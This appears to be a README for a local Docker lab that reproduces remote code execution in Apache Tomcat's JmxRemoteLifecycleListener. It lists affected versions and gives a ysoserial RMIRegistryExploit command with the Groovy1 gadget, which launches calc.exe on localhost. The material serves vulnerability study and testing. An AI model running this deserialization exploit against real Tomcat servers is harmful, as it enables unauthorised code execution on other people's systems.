Remote code execution is possible with Apache Tomcat if JmxRemoteLifecycleListener is used and an attacker can reach JMX ports. The issue exists because this listener wasn't updated for consistency with the CVE-2016-3427 Oracle patch that affected credential types.
Affected versions:
Tomcat 6.0.0 to 6.0.47
Tomcat 7.0.0 to 7.0.72
Tomcat 8.0.0-RC1 to 8.0.38
Tomcat 8.5.0 to 8.5.6
Tomcat 9.0.0.M1 to 9.0.0.M11
Requires JDK < 7u131 or 8u121
Run:
    docker-compose up
After that, use ysoserial to exploit it:
    java -cp ysoserial.jar ysoserial.exploit.RMIRegistryExploit localhost 10001 Groovy1 calc.exe